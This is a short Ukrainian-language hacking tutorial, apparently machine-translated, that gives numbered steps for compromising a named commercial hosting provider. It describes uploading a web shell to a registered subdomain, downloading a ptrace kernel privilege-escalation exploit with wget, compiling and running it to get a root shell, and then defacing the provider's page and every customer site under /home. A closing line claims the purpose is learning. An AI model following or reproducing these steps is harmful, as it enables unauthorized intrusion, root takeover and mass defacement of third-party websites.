Так, метод скрипт-кідді + фантазія я сподіваюся зрозумілий, тоді переходимо далі, наступна мета для нас буржуйський хостинг: www.primesource-hosting.com Для того, щоб його зламати довелося зареєструватися на ньому. Отже:
1) Реєструємо піддомен demo.primesource-hosting.com
2) Закачуємо на нього Shell як в попередньому пункті
3) Дивимося свої права, природно вони низькі
4) Читаємо статті і наполегливо думаємо
5) Пишемо uname a; в Shellе і чманіє від відповіді! Версія ядра 2.4.18
6) Шукаємо експлоїти для цієї версії і знаходимо ptrace / kmod і mytrace
7) Далі простіше, нам відкрита папка / tmp;
8) Заливаємо експлоїт: wget -O /tmp/mptrace.c packetstormsecurity.nl/0304-expoits/myptrace.c;
9) Переходимо в папку cd / tmp;
10) Компілюємо експлоїт: gcc -o exploit myptrace.c;
11) Запускаємо його. / Exploit;
12) Отже, у нас відкрився Shell на порту 24876 з правами рута (тільки він через 1 день вже накриється), тепер просто коннектимся до нього telnetом, знаходимо головну сторінку в папці / home / primesou / public_html / і замінюємо на свою також як і в попередньому пункті.
13) Дивимося папку / home / і бачимо, що всі папки, які там є, все це сайти хостящіеся тут. Тепер просто поспіль заходимо в усі ці папки і дефейси всі сайти.
Отже, я сподіваюся, що читач зрозумів і зможе повторити хоча б рівень 1-ий і 2-ий і наведеної мною статті, але не по-шкідницьких цілях, а для навчання і подальшої допомоги зламаної системі.
Ось і все, на закінчення скажу, що ці зломи все мають свої дзеркала на www.void.ru і на rusproj.by.ru; Якщо хтось має якісь питання, будь ласка, звертайтеся: [email protected]